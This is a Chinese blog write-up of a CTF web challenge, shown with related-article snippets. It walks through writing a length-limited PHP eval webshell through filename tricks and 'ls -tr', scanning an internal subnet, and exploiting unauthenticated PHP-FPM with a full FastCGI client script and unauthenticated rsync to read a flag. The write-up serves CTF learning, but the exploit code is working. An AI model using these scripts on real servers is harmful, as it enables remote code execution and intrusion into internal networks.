ctf473831530_2018_web_virink_web74

最新推荐文章于 2024-09-01 10:53:04 发布
最新推荐文章于 2024-09-01 10:53:04 发布
阅读量285 收藏 2
点赞数
文章标签: gnu debian 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62805300/article/details/125175162
版权
这篇博客探讨了如何通过创建特殊的文件并利用`ls -tr`命令拼接shell,以及如何通过网络服务如PHP-FPM和rsync的未授权访问漏洞进行远程操作。博主分享了Python脚本,展示了如何执行命令、探测内网端口、传输文件以及读取远程文件以获取flag。
摘要由CSDN通过智能技术生成

需要一个shell,长度限定了20.

利用1=>filename的特性创建特殊的文件,然后ls -tr列文件拼出完整的shell。ls -tr是按照文件创建时间顺序倒序列文件。由于我们的Shell带有大量特殊字符,考虑转义的问题,我们再套一层echo即可。

 即我们要写入的内容是echo '<?php eval($_GET[c]);' > 2.txt,可以拆成如下几段:

echo\ \\
\'\<\?php \\
eval\(
\$_GET\[c\]\)
\;\'\>2.txt
每一个文件名中有空格的都需要在行尾加上\\

参考大佬的脚本

import requests

base_url = 'http://a40430ad-39b5-4020-a550-14afee81e640.node1.buuoj.cn'


def exec_cmd2(c):
    # exec cmd
    my_params = {
        'cmd': c
    }
    r = requests.get(base_url, params=my_params)
    print('exec cmd2', c, r)


def write_webshell():
    filename = [r'>echo\ \\', r">\'\<\?php \\", r'>eval\(', r'>\$_GET\[c\]\)', r">\;\'\>2.php"]
    for i in filename:
        my_params = {
            'cmd': i
        }
        r = requests.get(base_url, params=my_params)
        print(i, r.status_code)

    cmd_list = ['ls -tr>1.sh', 'sh 1.sh']
    for i in cmd_list:
        exec_cmd2(i)

if __name__ == '__main__':
    write_webshell()
    print('ok')

传个phpinfo

 找不到flag

提示不在这台服务器需要跨机操作 

查看内网信息

cat /proc/net/fib_trie

 

参考大佬脚本

import socket
 
def foo():
    with open('active_port.txt','at') as f:
        for k in range(1,257):
            print(k)
            for i in [80,8080,9000]:
                ip = '10.244.81.{}'.format(k)
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.settimeout(0.3)
                    s.connect((ip,i))
                    s.close()
                    print(str(ip)+'=>'+str(i)+'\n')
                    f.writelines(str(ip)+'=>'+str(i)+'\n')
                except :
                    pass
        f.close()
    pass
 
if __name__ == '__main__':
    foo()
    print('ok')

 

开放80,873,9000端口

9000——PHP-FPM未授权访问漏洞

873——rsync未授权访问漏洞

上传php-fpm的利用脚本                                                                 fastcfi php-fm未授权访问

import socket
import random
import argparse
import sys
from io import BytesIO
 
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
 
PY2 = True if sys.version_info.major == 2 else False
 
 
def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])
 
 
def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)
 
 
def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')
 
 
def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s
 
 
class FastCGIClient:
    """A Fast-CGI Client for Python"""
 
    # private
    __FCGI_VERSION = 1
 
    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3
 
    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11
 
    __FCGI_HEADER_SIZE = 8
 
    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3
 
    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()
 
    def __connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # if self.keepalive:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
        # else:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
        try:
            self.sock.connect((self.host, int(self.port)))
        except socket.error as msg:
            self.sock.close()
            self.sock = None
            print(repr(msg))
            return False
        return True
 
    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
              + bchr(fcgi_type) \
              + bchr((requestid >> 8) & 0xFF) \
              + bchr(requestid & 0xFF) \
              + bchr((length >> 8) & 0xFF) \
              + bchr(length & 0xFF) \
              + bchr(0) \
              + bchr(0) \
              + content
        return buf
 
    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                      + bchr((nLen >> 16) & 0xFF) \
                      + bchr((nLen >> 8) & 0xFF) \
                      + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                      + bchr((vLen >> 16) & 0xFF) \
                      + bchr((vLen >> 8) & 0xFF) \
                      + bchr(vLen & 0xFF)
        return record + name + value
 
    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header
 
    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))
 
        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''
 
            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record
 
    def request(self, nameValuePairs={}, post=''):
        if not self.__connect():
            print('connect failure! please check your fasctcgi-server !!')
            return
 
        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                                 + bchr(self.keepalive) \
                                 + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)
 
        if paramsRecord:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
 
        if post:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
 
        self.sock.send(request)
        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
        self.requests[requestId]['response'] = b''
        return self.__waitForResponse(requestId)
 
    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf
 
        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']
 
    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)
 
 
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
    parser.add_argument('host', help='Target host, such as 127.0.0.1')
    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
    parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)
 
    args = parser.parse_args()
 
    client = FastCGIClient(args.host, args.port, 3, 0)
    params = dict()
    documentRoot = "/"
    uri = args.file
    content = args.code
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': 'auto_prepend_file = php://input',
        'PHP_ADMIN_VALUE': 'allow_url_include = On'
    }
    response = client.request(params, content)
    print(force_text(response))
python3 php.py 10.244.81.252 /www/redirect.php -c \"<?php system('ls /');?>\"

找到flag 

读取不了

 

利用rsync                                                                 rsync 未授权访问

传输到/tmp下

python3 php.py 10.244.81.252 /www/redirect.php -c \"<?php system('rsync 127.0.0.1::src/7h1s_i5_f14g /tmp/');?>\"

 再读取flag

 python3 php.py 10.244.81.252 /www/redirect.php -c \"<?php system('cat /tmp/7h1s_i5_f14g ');?>\"

 

R0ck3t
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
题解:ctf473831530_2018_web_virink_web71
qq_62886656的博客
06-13 648
题解:ctf473831530_2018_web_virink_web
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
BUUCTF[ctf473831530_2018_web_virink_web]
qq_62078839的博客
06-12 806
文件存储路径就是md5(orange.ip)限制字符写shell 参考文章CTF-web 第十三部分 命令注入 成功写入shell通过上面的脚本写入shell,连上蚁剑 看一下主机信息 这里并没有看到内网ip,换个姿势 试了一下这里面的ip都没有开放端口,再经过Article_kelp师傅的帮助下,扫描到了ip 9000对应php-fpm,873对应nsync我们可以自己构造fastcgi协议,和fpm进行通信参考文章Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp
ctf web5 练习_针对CTF,大家都是怎么训练的?
weixin_39611072的博客
12-20 206
Github:sunnyelf (Jing Ling)CTF Group:473831530(集各路赛棍大牛,听说进群得先解出flag : P)**********************************************************学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P******************************...
PHP-FPM Fastcgi 未授权访问漏洞复现
玄道的网安博客
03-05 969
简介 PHP-FPM是一个fastcgi协议解析器,Nginx等服务器中间件将用户请求按照fastcgi的规则打包好传给FPM。FPM按照fastcgi的协议将TCP流解析成真正的数据。PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。 环境搭建 这里使用docker进行搭建 https://github.com/vulhub/vulhub 进入目录并启动 cd vulhub-master/php/fpm/ ...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3072
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
fastcgi未授权访问及任意命令执行
小小猪的博客
11-23 443
fastcgi未授权访问及任意命令执行 漏洞原理: 服务端使用fastcgi协议并对外网开放9000端口,攻击者可以构造fastcgi协议包内容,实现未授权访问服务端.php文件以及执行任意命令。 环境搭建: 漏洞复现: poc: import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastC
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 668
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
ISO C++ 和 GNU C++ 的区别
Jankin的博客
08-28 739
C++ 的ios标准和gnu标准是两种编译器标准或模式,主要由编译器在编译 C++ 代码时所遵循的规范决定。它们之间的区别主要在于是否包含标准之外的扩展以及对特定功能的支持。
Ubuntu安装交叉编译工具链(gcc-linaro-6.3.1-2017.05-x86_64_aarch64-linux-gnu
weixin_53000184的博客
08-28 398
Ubuntu安装交叉编译工具链(gcc-linaro-6.3.1-2017.05-x86_64_aarch64-linux-gnu
GNU/Linux - RSYSLOG
guoqx的专栏
08-27 1019
etc/rsyslog.conf 是 rsyslog 的默认配置,要添加任何用户配置,需要指定 rsyslog.d 目录,并在默认配置中添加该目录,以便从该目录加载所有配置文件。8月 25 21:02:47 ubuntu-yocto rsyslogd[895]: [origin software="rsyslogd" swVersion="8.2112.0" x-pid="895" x-info="https://www.rsyslog.com"] rsyslogd was HUPed。
Ubuntu/Debian 上删除未使用的软件包
xiaochong0302的博客
09-01 340
随着时间的推移,Linux 系统可能会有大量不再使用的软件包。这些软件包会占用大量磁盘空间,并可能降低系统的整体性能。本指南将向您展示如何轻松地删除这些未使用的包。
微服务CI/CD实践(二)服务器先决软件安装
lbmydream的博客
08-28 1031
微服务CI/CD实践系列: 微服务CI/CD实践(一)环境准备及虚拟机创建 微服务CI/CD实践(二)服务器先决准备 微服务CI/CD实践(三)gitlab部署 微服务CI/CD实践(四)nexus3部署 微服务CI/CD实践(五)数据库,redis,nacos等基础中间件部署 微服务CI/CD实践(六)Jenkins部署 微服务CI/CD实践(七)Server服务器环境初始化 微服务CI/CD实践(八)Jenkins + Dokcer 部署微服务后端项目 微服务CI/CD实践(九)Jenkins +
Java项目服务器CPU飙升问题排查
最新发布
晨港飞燕的专栏
09-01 601
近期商城订单数量激增,定时任务在处理大数据量时出现性能问题,后续将对此类场景下可能存在的问题进行全面优化,排查线上问题,多使用相关工具,比如Java 命令行工具,可视化软件(HeapAnalyzer等),第三方插件(通过分析,推断可能服务因为CPU资源占用问题向注册中心nacos心跳请求失败,注册中心把服务下线,排除掉代码中可能存在的死循环,线程阻塞的大方向后,随即对异常进程进行分析。功能:MAT是一个强大的内存分析工具,用于分析堆转储文件,帮助开发人员发现内存泄漏和分析内存使用情况。
Mysql在服务器中的源码部署
m0_68635801的博客
08-29 559
复制mysql的服务文件到mysqld启动文件下。编辑my.cnf 文件。最后初始化,就OK了。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值